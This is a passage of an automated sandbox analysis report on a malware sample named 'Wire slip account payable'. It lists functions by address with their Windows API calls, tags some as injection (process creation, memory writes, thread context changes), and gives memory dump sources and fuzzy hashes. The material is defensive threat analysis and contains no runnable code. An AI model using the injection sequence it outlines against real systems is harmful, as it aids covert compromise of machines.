Instruction Fuzzy Hash: 76A15AB1D0061ADFDF10CFA8C8417EEBBB6BF45314F1485AAE848A7240DB759985CF92

Function 07497F70 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074981A6

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6934cfd7bc141ccb3723b27bc55dd537c50c8b811f854b51a3da3cc2a0e61ac5
Instruction ID: c6beee57fb39f692fb60b904037e8aca524622114878b93fa00f1bc0ef0aae6c
Opcode Fuzzy Hash: 6934cfd7bc141ccb3723b27bc55dd537c50c8b811f854b51a3da3cc2a0e61ac5
Instruction Fuzzy Hash: 7B9159B1D0061ADFDF10CFA8C8407EEBBB6BF45314F1485AAE848A7240DB759985CF92

Function 0155AD08 Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0155AF5E

Memory Dump Source

Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a8a4d8711b2294f16fbb30df1d71f06be6c8ea6f8e0f0effb724697df33bad0c
Instruction ID: 4a547a13e8c4d6054c92a6fa3e81ca678d6ac82fd5c6f60795d05d3a75ead540
Opcode Fuzzy Hash: a8a4d8711b2294f16fbb30df1d71f06be6c8ea6f8e0f0effb724697df33bad0c
Instruction Fuzzy Hash: A1713570A00B058FD764DF29D06479ABBF5FF88304F108A2ED89ADBA50D774E949CB91

Function 015544B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015559A9

Memory Dump Source

Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f331a7c7b57eabf7e96ead5fe8cfd62e7032fd44b83e80eebc5bf7914e05c694
Instruction ID: e55c41e26fcd8dcdca1d57cc02ff8c336923a374cc1436571397394a01e2dc15
Opcode Fuzzy Hash: f331a7c7b57eabf7e96ead5fe8cfd62e7032fd44b83e80eebc5bf7914e05c694
Instruction Fuzzy Hash: 9A41E1B0C1071DCBDB24DFA9C8447DEBBB5BF49304F2084AAD408AB251EBB56945CF90

Function 015558EC Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015559A9

Memory Dump Source

Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 66b3bceaae015b285b040d9833206bc9943e69651c5170de5391e1ffd1d463df
Instruction ID: a0df0f1dcb303273fadcaa4c1457ba07bb84ddcac653e01ff4eb7e45a625f277
Opcode Fuzzy Hash: 66b3bceaae015b285b040d9833206bc9943e69651c5170de5391e1ffd1d463df
Instruction Fuzzy Hash: 4241EFB0C00719CADB24DFAAC8847DDBBB5BF48304F24809AD808AB251EBB56945CF90

Function 07497CE0 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07497D78

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1c6ea4da0e945def99bc0d1ae846488533ab325236581bb3ee5a94b74f291a74
Instruction ID: 71891633ea5ad4371699fc035cd98fb7027a5e8ba8d155fd913bbd42edabff89
Opcode Fuzzy Hash: 1c6ea4da0e945def99bc0d1ae846488533ab325236581bb3ee5a94b74f291a74
Instruction Fuzzy Hash: 4D2155B19003599FCF10CFA9C881BEEBBF0FF48324F10842AE958A7240C7789944CBA0

Function 07497CE8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07497D78

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4b2707b5e8a63fb035d7bbcf09649b01e33ee8ed99127c0721f145ac8e46f8f1
Instruction ID: e55a660a191d88dfa5555bcc9f2a2e48e31b9d7053f3525dbcd729d1f98a420d
Opcode Fuzzy Hash: 4b2707b5e8a63fb035d7bbcf09649b01e33ee8ed99127c0721f145ac8e46f8f1
Instruction Fuzzy Hash: B12126B19003599FCF10CFA9C985BEEBBF5FF48314F10842AE959A7250D7789944CBA4

Function 07497B48 Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07497BCE

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5803c7bbe1dc452cc1c6e8d44de24bbac3f4bd6f01ba7ada5cb1c6d7b1b46674
Instruction ID: 8f0ef8f34de54d0a130c6bf233ff6c4297b5d2fef0e5f50b0d5c859298c42f98
Opcode Fuzzy Hash: 5803c7bbe1dc452cc1c6e8d44de24bbac3f4bd6f01ba7ada5cb1c6d7b1b46674
Instruction Fuzzy Hash: 0E215CB19003098FDB10DFAAC4857EEBFF4EF88324F14842AD459A7240C7789585CFA5

Function 07497DD0 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07497E58

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f64c76d19af176e05a2c26c37d73be7cb4a5361d5a2720be4822fddedf4ecbff
Instruction ID: 1a5403a3038695b3f9dba2e3458052a4694cfc50b82367e670ec3d9896469ec0
Opcode Fuzzy Hash: f64c76d19af176e05a2c26c37d73be7cb4a5361d5a2720be4822fddedf4ecbff
Instruction Fuzzy Hash: D72139B18002599FCF10CFA9C881AEEFBF5FF48320F10842AE558A7250C7349945CBA4

Function 07497DD8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07497E58

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d983af5100510c3d94c2ab337421f1bb0928e46b81c097ac38e97ad371dcddca
Instruction ID: 3f0d5fbb002c4e858ba5ce6c14f627c2c4dbff536b9c83078fa99eca65b37465
Opcode Fuzzy Hash: d983af5100510c3d94c2ab337421f1bb0928e46b81c097ac38e97ad371dcddca
Instruction Fuzzy Hash: 502128B18003599FCF10DFAAC885AEEFBF5FF48320F10842AE558A7250C7349944CBA4

Function 07497B50 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07497BCE

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7fb879819e4865a6650be06771a09c2e2257f9bbf11bcac7ac059b84a9565d80
Instruction ID: 23aa6323f92cf776af9442bf6e6b9ee5dfb3ba35ddff742b70b3a7536ea928ef
Opcode Fuzzy Hash: 7fb879819e4865a6650be06771a09c2e2257f9bbf11bcac7ac059b84a9565d80
Instruction Fuzzy Hash: 6C2138B19003098FDB10DFAAC4857EEBBF4EF88324F10842AD459A7240CB78A944CFA4

Function 0155D5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D677

Memory Dump Source

Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5f1439312662e10d5bd174cb6f5373927d596ec6b59ab08cc84d025b3100357f
Instruction ID: b5b849363f57a5d9e4e387f16e00d3f320908789aaae68b7abc82d6f544da235
Opcode Fuzzy Hash: 5f1439312662e10d5bd174cb6f5373927d596ec6b59ab08cc84d025b3100357f
Instruction Fuzzy Hash: E721C4B5900258DFDB10CF9AD584ADEBFF4FB48324F14841AE958A7350D374A944CFA5

Function 0155D5E9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D677

Memory Dump Source

Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 16718334e13e3296d21d9508e3f45e5f35454174cc60afb2c26bc278f7c0ac9f
Instruction ID: 4fd7ff6ca62775cd3409c7224fe3ef685da9df191542152da74b7846128d9536
Opcode Fuzzy Hash: 16718334e13e3296d21d9508e3f45e5f35454174cc60afb2c26bc278f7c0ac9f
Instruction Fuzzy Hash: 3421E2B6900258DFDB10CFAAD584AEEBFF4FB48324F14841AE958A7310C378A940CF64

Function 07497C20 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07497C96

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 42c03e5ddd69601d02fb78cc7583a5c1e9952fc0571b6f03cdd5c10906451abc
Instruction ID: bbb951f2bd4d8d11a78184f57d8660dd892852a0f8b3c63bc27f7325680c7deb
Opcode Fuzzy Hash: 42c03e5ddd69601d02fb78cc7583a5c1e9952fc0571b6f03cdd5c10906451abc
Instruction Fuzzy Hash: 53118CB19002489FCF20DFAAD8046EEBFF5EB88324F10882AD415A7210C7359540CFA4

Function 07497A98 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07497B02

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8eb309267af9f6b9e6e91bb84e324047e0ef6f4b0fd4e7341faaa12775fd8466
Instruction ID: cfdd647188af6db53c5f459f61b2a550b3df420e36bf72bc41139c5aa548a1e3
Opcode Fuzzy Hash: 8eb309267af9f6b9e6e91bb84e324047e0ef6f4b0fd4e7341faaa12775fd8466
Instruction Fuzzy Hash: CE116DB19003488FCB10DFAAD4457EEFFF4EB88324F20882AD459A7640CB356545CFA5

Function 07497C28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07497C96

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f3f215eca68f072f34b15668ed4e16374df91dfe7e329b90cd17f7f45e94d882
Instruction ID: dadcbe6e85076cf24548518b7c1f0ea07411302b518533ddc86c61718ed3c4a6
Opcode Fuzzy Hash: f3f215eca68f072f34b15668ed4e16374df91dfe7e329b90cd17f7f45e94d882
Instruction Fuzzy Hash: 1F1126B19002499FCB10DFAAC844ADEBFF5EB88324F10882AE559A7250C775A544CFA4

Function 0749C390 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0749C3F5

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 530bff688c2db7dcab047e912ef3e5f454734cc70bd4df090f72b86968885adf
Instruction ID: a3e38c617ff6c95e71ba706f75b3f1d5f1f0e7230997499600af030b7ca6e1df
Opcode Fuzzy Hash: 530bff688c2db7dcab047e912ef3e5f454734cc70bd4df090f72b86968885adf
Instruction Fuzzy Hash: 641125B58003499FDB20CF9AD485BDEFFF8EB48324F10881AE518A7640C374A584CFA5

Function 07497AA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07497B02

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5d0dc0c56166559f5383f24189ce3315ac2144f24fbed5f5c405fb2dcd2bddf0
Instruction ID: 71c63fce35fcadb2ef173338235d23879694476bb0bb90b69cadd7b0b8917205
Opcode Fuzzy Hash: 5d0dc0c56166559f5383f24189ce3315ac2144f24fbed5f5c405fb2dcd2bddf0
Instruction Fuzzy Hash: 86113AB19003598FCB10DFAAC4457EEFFF4EB88324F20882AD459A7250CB75A544CFA4

Function 07494920 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0749C3F5

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b217f469c00c116d39256aae5a223f476362f92b6de3e863f29838d2e749d6cf
Instruction ID: 348cfd71d7dbb0567a99a4718ce0a91b6a428af4c767b61edc43a989325bf887
Opcode Fuzzy Hash: b217f469c00c116d39256aae5a223f476362f92b6de3e863f29838d2e749d6cf
Instruction Fuzzy Hash: 2611F5B5800349DFDB20DF99D484BDEBFF8EB48324F10885AE558A7600C375A944CFA5

Function 0155AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0155AF5E

Memory Dump Source

Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: aa2551d8b7893c7b7ede4f7c3417515a1e9b40757b5f25ccc31a39fd32438d06
Instruction ID: 778b1eb04f8f499ef7bde3884ea7ceefeee4e7ba69e5b626e31ff2b5c515501c
Opcode Fuzzy Hash: aa2551d8b7893c7b7ede4f7c3417515a1e9b40757b5f25ccc31a39fd32438d06
Instruction Fuzzy Hash: 12110FB5C002498FDB10CF9AC444ADEFBF4EF88224F10852AD928AB250C379A545CFA1

Function 0106D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d91f7978549a252a3b23b8d39bcbf032ba59fbe79007b48d8f001643b6da9a
Instruction ID: 2c7d3e067dbb801ad91c65a869e15844a1533a8b7875ab0fee6fbf6adb67b296
Opcode Fuzzy Hash: b6d91f7978549a252a3b23b8d39bcbf032ba59fbe79007b48d8f001643b6da9a
Instruction Fuzzy Hash: C5212571600240DFDB05DF58D9C0B2ABFA9FB88318F24C5A9E9894B656C336D456CBA1

Function 0106D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e600f94f04b1ebdfa8af6a45bb6f6c038a85b7ab0b179ceb68dcf46d370929
Instruction ID: 6ec256b64f3b0510b7b2a49e4bff65572e6e8e2229ee74427f5028df7e97ca15
Opcode Fuzzy Hash: f7e600f94f04b1ebdfa8af6a45bb6f6c038a85b7ab0b179ceb68dcf46d370929
Instruction Fuzzy Hash: 86214871600244DFDB01DF48C9C0B5ABFA9FB98314F20C1A9E9894F256C736E846C7A1

Function 0107D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738471469.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_107d000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79d356f667f44e108b46bf55e57291f76ce2f6edb8af079bbe35083b43a2b654
Instruction ID: a2b75333de2392c91369fa2bd43fdbde8a26bd0206b4846b7c6ac961db99fb6d
Opcode Fuzzy Hash: 79d356f667f44e108b46bf55e57291f76ce2f6edb8af079bbe35083b43a2b654
Instruction Fuzzy Hash: DB210471A04200EFDB05DF98D9C0B2ABBA5FF94324F24C6ADE9894B256C336D447CB65

Function 0107D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738471469.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_107d000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e96e73d760a2c90cb445965bb81a1971e18f3fed43586fafde793a24240560e
Instruction ID: 30f37c9ffe6958a6068b2bcfdba37a570956b6de83927c37e796d9b8a61d614b
Opcode Fuzzy Hash: 4e96e73d760a2c90cb445965bb81a1971e18f3fed43586fafde793a24240560e
Instruction Fuzzy Hash: 46212271A04200DFCB16DF58D984B2ABFA5EF84314F20C5ADE98A4B256C33AD447CBA5

Function 0107D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738471469.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_107d000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff30d37f7c83dc63975b6c36228a96a11d30e8bf8aa7221e03cfe05d5234b817
Instruction ID: f0e57596cde19eb1b28b16b3940b6dc7a40a4968b3885ae15f200660fddb0086
Opcode Fuzzy Hash: ff30d37f7c83dc63975b6c36228a96a11d30e8bf8aa7221e03cfe05d5234b817
Instruction Fuzzy Hash: CE2165755093808FD713CF64D594715BFB1EF46214F28C5DAD8898F667C33A980ACBA2

Function 0106D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 97763d7edb302b1a8d3aa2f29622a22bd19448b46afcf8cbbadea57208e0ea5d
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: D9110372504240CFDB02CF44D5C4B56BFB1FB94324F24C2A9D9890B257C33AE85ACBA1

Function 0106D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: b1a42d726213726e1c537da8eaac259eea258281e860770896eff42ed92b74cb
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 5711D376504280CFDB16CF54D5C4B16BFB1FB84318F24C6AAD9890B657C336D45ACBA1

Function 0107D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738471469.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_107d000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: b54ee5643c3b73e5d2d1e3cbbcbdc7ea6343b1f48a8c9d57739f9b1f393b50c9
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: AF11BB75904280DFDB02CF54C5C4B15BFA1FF84224F28C6AADC894B296C33AD40BCB61

Function 0106D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4b47227d6fa2e32b4dfe73f2f63f5e67982cab86ac86a1cb5482b4c4b77db2
Instruction ID: 97a757968f866760b3bcc192488f2a73026be3da5c98f4ea3e3f0ff10317c16e
Opcode Fuzzy Hash: af4b47227d6fa2e32b4dfe73f2f63f5e67982cab86ac86a1cb5482b4c4b77db2
Instruction Fuzzy Hash: C401F7312083849AE7504A69CD84B6BBFDCFF41324F18C86AED884A286D23D9840C772

Function 0106D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e1d27843db9f7bf7888e9df9f9ca9df2e12103a0bc21ee22d07ca9faf4f508
Instruction ID: 078b83b8f1a7cbcb0df878d78c484626ae7c38613a9e31c1fcea78d1291ead3e
Opcode Fuzzy Hash: 91e1d27843db9f7bf7888e9df9f9ca9df2e12103a0bc21ee22d07ca9faf4f508
Instruction Fuzzy Hash: F9F062715043849EE7518E1ADC84B62FFECFF51638F18C49AED885A286D2799844CBB1

Non-executed Functions

Function 07495BA0 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

MS, xrefs: 07495BFB

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: MS
API String ID: 0-724152689
Opcode ID: c6c98f174c26d0f6ccd3a047e06b7439ebe884eddb4eb0c9e863be64eebc94fd
Instruction ID: b0ba7f00b98b14404e4919fbefe18eb147bd4a83423bdbc4cfa02e343244e3b5
Opcode Fuzzy Hash: c6c98f174c26d0f6ccd3a047e06b7439ebe884eddb4eb0c9e863be64eebc94fd
Instruction Fuzzy Hash: C1E1FAB4E105198FDB14DFA9C5809AEFBF2BF89304F24816AE414AB359DB31AD41CF60

Function 07495768 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 140ff209334f228ca96a19d6f3126e40761168ce4175858d76685d21ede2be8f
Instruction ID: 17e933e3bd343738fd4bb12b11265dcbbedd1b333a423d5c68872f84f120519b
Opcode Fuzzy Hash: 140ff209334f228ca96a19d6f3126e40761168ce4175858d76685d21ede2be8f
Instruction Fuzzy Hash: 68E1EBB4E101198FDB14DFA9C5809AEFBF2BF89314F24816AE415AB356DB31AD41CF60

Function 07495FD8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc6bc8e0b27c29147648a4aef7ac8ead53dac2ad642f10749f5f7ef3c57fb04
Instruction ID: f88578f12851cd43d875a9744c8f9e9312151385459d0da42ed59e1bb2a2b27e
Opcode Fuzzy Hash: 4bc6bc8e0b27c29147648a4aef7ac8ead53dac2ad642f10749f5f7ef3c57fb04
Instruction Fuzzy Hash: CEE1E7B4E101199FCB14DFA9C5809AEFBF2BF89304F25816AE414AB356DB31AD41CF61

Function 07495330 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda998e1e6307d240cac4b9e1637888bfd60459d464dbef91cf3f35726a5d388
Instruction ID: 18ce523563510af6de19ee4b3f4f6004ca42c9d2e4a69c60be820a505d6edec4
Opcode Fuzzy Hash: dda998e1e6307d240cac4b9e1637888bfd60459d464dbef91cf3f35726a5d388
Instruction Fuzzy Hash: 14E1FBB4E101199FCB15DFA9C5809AEFBF2BF89305F24816AE414AB356DB31AD41CF60

Function 07497278 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

